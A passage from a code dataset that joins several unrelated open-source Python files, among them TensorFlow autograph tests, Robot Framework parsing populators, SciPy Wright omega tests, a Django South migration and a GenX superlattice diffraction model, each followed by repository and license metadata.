self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()
|
kevin-coder/tensorflow-fork
|
tensorflow/python/autograph/impl/conversion_test.py
|
Python
|
apache-2.0
| 6,484 | 0.005244 |
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robot.errors import DataError
from robot.model import SuiteNamePatterns
from robot.output import LOGGER
from robot.utils import get_error_message, unic
from .datarow import DataRow
from .tablepopulators import (SettingTablePopulator, VariableTablePopulator,
TestTablePopulator, KeywordTablePopulator,
NullPopulator)
from .htmlreader import HtmlReader
from .tsvreader import TsvReader
from .txtreader import TxtReader
from .restreader import RestReader
READERS = {'html': HtmlReader, 'htm': HtmlReader, 'xhtml': HtmlReader,
           'tsv': TsvReader, 'rst': RestReader, 'rest': RestReader,
'txt': TxtReader, 'robot': TxtReader}
# Hook for external tools for altering ${CURDIR} processing
PROCESS_CURDIR = True
class FromFilePopulator(object):
_populators = {'setting': SettingTablePopulator,
'variable': VariableTablePopulator,
'test case': TestTablePopulator,
'keyword': KeywordTablePopulator}
def __init__(self, datafile):
self._datafile = datafile
self._populator = NullPopulator()
self._curdir = self._get_curdir(datafile.directory)
def _get_curdir(self, path):
return path.replace('\\','\\\\') if path else None
def populate(self, path):
LOGGER.info("Parsing file '%s'." % path)
source = self._open(path)
try:
self._get_reader(path).read(source, self)
except:
raise DataError(get_error_message())
finally:
source.close()
def _open(self, path):
if not os.path.isfile(path):
raise DataError("Data source does not exist.")
try:
# IronPython handles BOM incorrectly if not using binary mode:
# https://ironpython.codeplex.com/workitem/34655
return open(path, 'rb')
except:
raise DataError(get_error_message())
def _get_reader(self, path):
extension = os.path.splitext(path.lower())[-1][1:]
try:
return READERS[extension]()
except KeyError:
raise DataError("Unsupported file format '%s'." % extension)
def start_table(self, header):
self._populator.populate()
table = self._datafile.start_table(DataRow(header).all)
self._populator = self._populators[table.type](table) \
if table is not None else NullPopulator()
return bool(self._populator)
def eof(self):
self._populator.populate()
def add(self, row):
if PROCESS_CURDIR and self._curdir:
row = self._replace_curdirs_in(row)
data = DataRow(row)
if data:
self._populator.add(data)
def _replace_curdirs_in(self, row):
return [cell.replace('${CURDIR}', self._curdir) for cell in row]
class FromDirectoryPopulator(object):
ignored_prefixes = ('_', '.')
ignored_dirs = ('CVS',)
def populate(self, path, datadir, include_suites=None,
warn_on_skipped=False, include_extensions=None, recurse=True):
LOGGER.info("Parsing test data directory '%s'" % path)
include_suites = self._get_include_suites(path, include_suites or [])
init_file, children = self._get_children(path, include_extensions,
include_suites)
if init_file:
self._populate_init_file(datadir, init_file)
if recurse:
self._populate_children(datadir, children, include_extensions,
include_suites, warn_on_skipped)
def _populate_init_file(self, datadir, init_file):
datadir.initfile = init_file
try:
FromFilePopulator(datadir).populate(init_file)
except DataError as err:
LOGGER.error(err.message)
def _populate_children(self, datadir, children, include_extensions,
include_suites, warn_on_skipped):
for child in children:
try:
datadir.add_child(child, include_suites, include_extensions,
warn_on_skipped)
except DataError as err:
self._log_failed_parsing("Parsing data source '%s' failed: %s"
% (child, err.message), warn_on_skipped)
def _log_failed_parsing(self, message, warn):
if warn:
LOGGER.warn(message)
else:
LOGGER.info(message)
def _get_include_suites(self, path, incl_suites):
if not isinstance(incl_suites, SuiteNamePatterns):
incl_suites = SuiteNamePatterns(self._create_included_suites(incl_suites))
if not incl_suites:
return incl_suites
# If a directory is included, also all its children should be included.
if self._directory_is_included(path, incl_suites):
return SuiteNamePatterns()
return incl_suites
def _create_included_suites(self, incl_suites):
for suite in incl_suites:
yield suite
while '.' in suite:
suite = suite.split('.', 1)[1]
yield suite
def _directory_is_included(self, path, incl_suites):
name = os.path.basename(os.path.normpath(path))
return self._is_in_included_suites(name, incl_suites)
def _get_children(self, dirpath, incl_extensions, incl_suites):
init_file = None
children = []
for path, is_init_file in self._list_dir(dirpath, incl_extensions,
incl_suites):
if is_init_file:
if not init_file:
init_file = path
else:
LOGGER.error("Ignoring second test suite init file '%s'." % path)
else:
children.append(path)
return init_file, children
def _list_dir(self, dir_path, incl_extensions, incl_suites):
# os.listdir returns Unicode entries when path is Unicode
names = os.listdir(unic(dir_path))
for name in sorted(names, key=lambda item: item.lower()):
name = unic(name) # needed to handle nfc/nfd normalization on OSX
path = os.path.join(dir_path, name)
base, ext = os.path.splitext(name)
ext = ext[1:].lower()
if self._is_init_file(path, base, ext, incl_extensions):
yield path, True
elif self._is_included(path, base, ext, incl_extensions, incl_suites):
yield path, False
else:
LOGGER.info("Ignoring file or directory '%s'." % name)
def _is_init_file(self, path, base, ext, incl_extensions):
return (base.lower() == '__init__' and
self._extension_is_accepted(ext, incl_extensions) and
os.path.isfile(path))
def _extension_is_accepted(self, ext, incl_extensions):
if incl_extensions:
return ext in incl_extensions
return ext in READERS
def _is_included(self, path, base, ext, incl_extensions, incl_suites):
if base.startswith(self.ignored_prefixes):
return False
if os.path.isdir(path):
return base not in self.ignored_dirs or ext
if not self._extension_is_accepted(ext, incl_extensions):
return False
return self._is_in_included_suites(base, incl_suites)
def _is_in_included_suites(self, name, incl_suites):
return not incl_suites or incl_suites.match(self._split_prefix(name))
def _split_prefix(self, name):
return name.split('__', 1)[-1]
|
alexandrul-ci/robotframework
|
src/robot/parsing/populators.py
|
Python
|
apache-2.0
| 8,341 | 0.001079 |
"""Tests for the USB Discovery integration."""
from homeassistant.components.usb.models import USBDevice
conbee_device = USBDevice(
device="/dev/cu.usbmodemDE24338801",
vid="1CF1",
pid="0030",
serial_number="DE2433880",
manufacturer="dresden elektronik ingenieurtechnik GmbH",
description="ConBee II",
)
slae_sh_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="10C4",
pid="EA60",
serial_number="00_12_4B_00_22_98_88_7F",
manufacturer="Silicon Labs",
description="slae.sh cc2652rb stick - slaesh's iot stuff",
)
electro_lama_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="1A86",
pid="7523",
serial_number=None,
manufacturer=None,
description="USB2.0-Serial",
)
|
jawilson/home-assistant
|
tests/components/usb/__init__.py
|
Python
|
apache-2.0
| 753 | 0 |
from bambu_mail.shortcuts import subscribe
def newsletter_optin(sender, user, **kwargs):
subscribe(
user.email,
list_id = 'signup',
double_optin = False,
send_welcome = False
)
|
iamsteadman/bambu-mail
|
bambu_mail/receivers.py
|
Python
|
apache-2.0
| 217 | 0.036866 |
'''Doc build constants'''
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
DOCKER_SOCKET = getattr(settings, 'DOCKER_SOCKET', 'unix:///var/run/docker.sock')
DOCKER_VERSION = getattr(settings, 'DOCKER_VERSION', 'auto')
DOCKER_IMAGE = getattr(settings, 'DOCKER_IMAGE', 'rtfd-build')
DOCKER_LIMITS = {'memory': '200m', 'time': 600}
DOCKER_LIMITS.update(getattr(settings, 'DOCKER_LIMITS', {}))
DOCKER_TIMEOUT_EXIT_CODE = 42
DOCKER_OOM_EXIT_CODE = 137
|
titiushko/readthedocs.org
|
readthedocs/doc_builder/constants.py
|
Python
|
mit
| 491 | 0.002037 |
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
with given:
sch = schema.dict
with when:
res = sch.keys()
with then:
assert res == KeysView([])
def test_dict_keys():
with given:
sch = schema.dict({
"id": schema.int,
"name": schema.str,
optional("email"): schema.str,
})
with when:
res = sch.keys()
with then:
assert res == KeysView(["id", "name", "email"])
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572 | 0 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Category.content'
db.add_column('core_category', 'content', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Adding field 'Category.template'
db.add_column('core_category', 'template', self.gf('django.db.models.fields.CharField')(default='category.html', max_length=100), keep_default=False)
def backwards(self, orm):
# Deleting field 'Category.content'
db.delete_column('core_category', 'content')
# Deleting field 'Category.template'
db.delete_column('core_category', 'template')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.author': {
'Meta': {'object_name': 'Author'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.category': {
'Meta': {'unique_together': "(('site', 'tree_path'),)", 'object_name': 'Category'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']", 'null': 'True', 'blank': 'True'}),
'tree_path': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.dependency': {
'Meta': {'object_name': 'Dependency'},
'dependent_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'depends_on_set'", 'to': "orm['contenttypes.ContentType']"}),
'dependent_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'target_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dependency_for_set'", 'to': "orm['contenttypes.ContentType']"}),
'target_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.listing': {
'Meta': {'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']"}),
'commercial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"})
},
'core.publishable': {
'Meta': {'object_name': 'Publishable'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['core.Author']", 'symmetrical': 'False'}),
'category': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['core.Category']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['photos.Photo']", 'null': 'True', 'blank': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(3000, 1, 1, 0, 0, 0, 2)', 'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Source']", 'null': 'True', 'blank': 'True'}),
'static': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.related': {
'Meta': {'object_name': 'Related'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"}),
'related_ct': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'related_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.source': {
'Meta': {'object_name': 'Source'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'photos.photo': {
'Meta': {'object_name': 'Photo'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'photo_set'", 'symmetrical': 'False', 'to': "orm['core.Author']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'height': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'important_bottom': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_left': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_right': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'important_top': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Source']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['core']
|
petrlosa/ella
|
ella/core/south_migrations/0005_auto__add_field_category_content__add_field_category_template.py
|
Python
|
bsd-3-clause
| 11,864 | 0.008092 |
from __future__ import division, print_function, absolute_import
import pytest
import numpy as np
from numpy.testing import assert_, assert_equal, assert_allclose
import scipy.special as sc
from scipy.special._testutils import assert_func_equal
def test_wrightomega_nan():
pts = [complex(np.nan, 0),
complex(0, np.nan),
complex(np.nan, np.nan),
complex(np.nan, 1),
complex(1, np.nan)]
for p in pts:
res = sc.wrightomega(p)
assert_(np.isnan(res.real))
assert_(np.isnan(res.imag))
def test_wrightomega_inf_branch():
pts = [complex(-np.inf, np.pi/4),
complex(-np.inf, -np.pi/4),
complex(-np.inf, 3*np.pi/4),
complex(-np.inf, -3*np.pi/4)]
expected_results = [complex(0.0, 0.0),
complex(0.0, -0.0),
complex(-0.0, 0.0),
complex(-0.0, -0.0)]
for p, expected in zip(pts, expected_results):
res = sc.wrightomega(p)
# We can't use assert_equal(res, expected) because in older versions of
# numpy, assert_equal doesn't check the sign of the real and imaginary
# parts when comparing complex zeros. It does check the sign when the
# arguments are *real* scalars.
assert_equal(res.real, expected.real)
assert_equal(res.imag, expected.imag)
def test_wrightomega_inf():
pts = [complex(np.inf, 10),
complex(-np.inf, 10),
complex(10, np.inf),
complex(10, -np.inf)]
for p in pts:
assert_equal(sc.wrightomega(p), p)
def test_wrightomega_singular():
pts = [complex(-1.0, np.pi),
complex(-1.0, -np.pi)]
for p in pts:
res = sc.wrightomega(p)
assert_equal(res, -1.0)
assert_(np.signbit(res.imag) == False)
@pytest.mark.parametrize('x, desired', [
(-np.inf, 0),
(np.inf, np.inf),
])
def test_wrightomega_real_infinities(x, desired):
assert sc.wrightomega(x) == desired
def test_wrightomega_real_nan():
assert np.isnan(sc.wrightomega(np.nan))
def test_wrightomega_real_series_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = 1e20
x_before_crossover = np.nextafter(crossover, -np.inf)
x_after_crossover = np.nextafter(crossover, np.inf)
# Computed using Mpmath
desired_before_crossover = 99999999999999983569.948
desired_after_crossover = 100000000000000016337.948
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_exp_approximation_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = -50
x_before_crossover = np.nextafter(crossover, np.inf)
x_after_crossover = np.nextafter(crossover, -np.inf)
# Computed using Mpmath
desired_before_crossover = 1.9287498479639314876e-22
desired_after_crossover = 1.9287498479639040784e-22
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
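# Note on the reference values above (an assumption about how they were
# obtained): for real x the Wright omega function satisfies
# wrightomega(x) == lambertw(exp(x)) on the principal branch, so the
# "Computed using Mpmath" constants can be reproduced with mpmath's
# arbitrary-precision exp/lambertw evaluated at the exact nextafter arguments.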
def test_wrightomega_real_versus_complex():
x = np.linspace(-500, 500, 1001)
results = sc.wrightomega(x + 0j).real
assert_func_equal(sc.wrightomega, results, x, atol=0, rtol=1e-14)
|
jamestwebber/scipy
|
scipy/special/tests/test_wrightomega.py
|
Python
|
bsd-3-clause
| 3,616 | 0.000277 |
'''<h1>Library for surface x-ray diffraction simulations of superlattices</h1>
<p> The model is based on Fullerton's algorithm for superlattices as
described in Phys. Rev. B vol. 45 p. 9292 (1992).
'''
# Programmed by Matts Bjorck 20091215
import numpy as np
import genx.models.sxrd
from genx.models.utils import f, rho
import time
from genx.models.sxrd import UnitCell, AtomGroup, Instrument, Slab, SymTrans
__pars__ = ['SLSample', 'SLStandard', 'UnitCell', 'Slab', 'AtomGroup',
'Instrument']
class SLSample:
    '''Class that models a multilayer sample on top of a
    substrate according to Fullerton's model as given in
    Phys. Rev. B 45, 9292 (1992).
'''
def __init__(self, inst, bulk_slab, superlattice, unitcell,
bulk_sym = []):
self.set_bulk_slab(bulk_slab)
self.set_bulk_sym(bulk_sym)
self.superlattice = superlattice
self.inst = inst
self.set_unit_cell(unitcell)
def set_bulk_slab(self, bulk_slab):
'''Set the bulk unit cell to bulk_slab
'''
if not isinstance(bulk_slab, type(genx.models.sxrd.Slab())):
raise TypeError("The bulk slab has to be a member of"
" class Slab")
self.bulk = bulk_slab
def set_unit_cell(self, unit_cell):
'''Sets the unitcell of the sample
'''
        if unit_cell is None:
            unit_cell = genx.models.sxrd.UnitCell(1.0, 1.0, 1.0)
        if not isinstance(unit_cell, type(genx.models.sxrd.UnitCell(1.0, 1.0, 1.0))):
            raise TypeError("The unit cell has to be a member"
                            " of class UnitCell")
        self.unit_cell = unit_cell
def set_bulk_sym(self, sym_list):
'''Sets the list of allowed symmetry operations for the bulk
sym_list has to be a list ([]) of symmetry elements from the
class SymTrans
'''
# Type checking
if not isinstance(sym_list, type([])):
raise TypeError("The surface symmetries has to contained"
" in a list")
if sym_list == []:
sym_list = [genx.models.sxrd.SymTrans()]
if min([isinstance(sym, type(genx.models.sxrd.SymTrans())) for
sym in sym_list]) == 0:
raise TypeError("All members in the symmetry list has to"
" be a memeber of class SymTrans")
self.bulk_sym = sym_list
def calc_i(self, h, k, l):
'''Calculate the diffracted intensity from a superlattice.
The diffracted intensity from the superlattice and the substrate
        are added, i.e. it is assumed that the film is not coherent with
the substrate.
'''
bulk_i = np.abs(self.calc_fb(h, k, l))**2
sl_i = np.abs(self.superlattice.calc_i(h, k, l))
return (bulk_i + sl_i)*self.inst.inten
def calc_fb(self, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, el, u, oc, c = self.bulk._extract_values()
oc = oc/float(len(self.bulk_sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Calculate the "shape factor" for the CTRs
eff_thick = self.unit_cell.c/np.sin(self.inst.alpha*np.pi/180.0)
alpha = (2.82e-5*self.inst.wavel*eff_thick/self.unit_cell.vol()*
np.sum(f.imag,1))
denom = np.exp(2.0*np.pi*1.0J*l)*np.exp(-alpha) - 1.0
# Delta functions to remove finite size effect in hk plane
delta_funcs=(abs(h - np.round(h)) < 1e-12)*(
abs(k - np.round(k)) < 1e-12)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in self.bulk_sym], 0)
,1)
# Putting it all togheter
fb = f_u/denom*delta_funcs
return fb
class Superlattice:
    '''Class that describes a superlattice; can be subclassed
    to implement different strain profiles, interdiffusion etc.
'''
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
self.a_slab = a_slab
self.b_slab = b_slab
if a_sym == []:
self.a_sym = [genx.models.sxrd.SymTrans()]
else:
self.a_sym = a_sym
if b_sym == []:
self.b_sym = [genx.models.sxrd.SymTrans()]
else:
self.b_sym = b_sym
self.unit_cell = unit_cell
self.inst = inst
def _extract_slab_values(self, slabs, sym):
'''Extracts the necessary parameters for simulating
a list of stacked slabs
'''
# Extract the parameters we need
        # the star in zip(*...) transforms the list elements into arguments
xt, yt, zt, elt, ut, oct, ct = list(zip(*[slab._extract_values()
for slab in slabs]))
        x = np.r_[xt]
y = np.r_[yt]
# scale and shift the slabs with respect to each other
cn = np.cumsum(np.r_[0, ct])[:-1]
z = np.concatenate([zs*c_s + c_cum
for zs, c_cum, c_s in zip(zt, cn, ct)])
#el = reduce(lambda x,y:x+y, elt)
el = np.r_[elt]
u = np.r_[ut]
oc = np.r_[oct]
#print x,y,z, u
t_lay = sum(ct)
return x, y, z, u, oc, el, t_lay
def calc_fslab(self, slablist, sym, h, k, l):
        '''Calculate the structure factors from a stack of slabs
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, u, oc, el, t_lay = self._extract_slab_values(slablist,
sym)
oc = oc/float(len(sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in sym], 0)
,1)
#return f_u, (z.max() - z.min())*np.ones(l.shape)
return f_u, t_lay*np.ones(l.shape)
def calc_fa(self, n, h, k, l):
        '''Calculate the structure factor for an A layer
        n is the thickness of the layer in units of slabs'''
pass
def calc_fb(self, n, h, k, l):
        '''Calculate the structure factor for a B layer
        n is the thickness of the layer in units of slabs'''
pass
def calc_fsl(self, unit_cell, h, k, l):
        '''Calculate the structure factor for the entire
superlattice.
'''
raise NotImplementedError('calc_fsl has to be implemented in '
'a Superlattices subclass')
class SLStandard(Superlattice):
'''Class that implements a "standard" superlattice, no strain
included.
'''
_pars = {'sigmaa': 1e-12, 'sigmab':1e-12, 'repetitions':2, 'na':2,
'nb': 2,'a': 0.0, 'c':1e-12}
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
Superlattice.__init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = a_sym, b_sym = b_sym)
[self._make_set_func(name, self._pars[name]) for name in
list(self._pars.keys())]
[self._make_get_func(name) for name in list(self._pars.keys())]
def calc_fa(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.a_slab]*n, self.a_sym,
h, k, l)
return f_slab, t_z
def calc_fb(self, n, h, k, l):
f_slab, t_z = self.calc_fslab([self.b_slab]*n, self.b_sym,
h, k, l)
return f_slab, t_z
def thick_prob(self, n_mean, stand_dev):
        # According to Fullerton it's enough to include three
# standard deviations in the averaging
lower = np.floor(n_mean-3.0*stand_dev)
lower = np.int(min(lower, n_mean - 1))
        # We can't have a negative thickness, although clipping it truncates
        # the gaussian distribution. How does this affect the theoretical
        # assumptions?
if lower < 1:
lower = 1
upper = np.ceil(n_mean + 3.0*stand_dev)
n = np.arange(lower,
np.int(max(upper, n_mean + 1) + 1))
#print 'n: ', n
prob = np.exp(-(n - n_mean)**2/2.0/stand_dev**2)
prob = prob/sum(prob)
return n, prob
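    # Worked example (illustrative, not part of the original code): with
    # n_mean=4.0 and stand_dev=0.3 the bounds become lower=3 and upper=5, so
    # thick_prob returns n = [3, 4, 5] with nearly all of the normalized
    # Gaussian weight on n = 4.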
def calc_i(self, h, k, l):
        ''' Function to calculate the diffracted intensity from a superlattice
'''
        # Create the different thicknesses to average over
na, pa = self.thick_prob(self.na, self.sigmaa)
nb, pb = self.thick_prob(self.nb, self.sigmab)
tmp = np.array([self.calc_fa(n, h, k, l) for n in na])
fa = tmp[:, 0, :]
ta = tmp[:, 1, :]
tmp = np.array([self.calc_fb(n, h, k, l) for n in nb])
fb = tmp[:, 0, :]
tb = tmp[:, 1, :]
#print pa.shape, fa.shape
pa = pa[:, np.newaxis]
pb = pb[:, np.newaxis]
        # Do the different averaging
fafa = (pa*fa*fa.conj()).sum(0)
fbfb = (pb*fb*fb.conj()).sum(0)
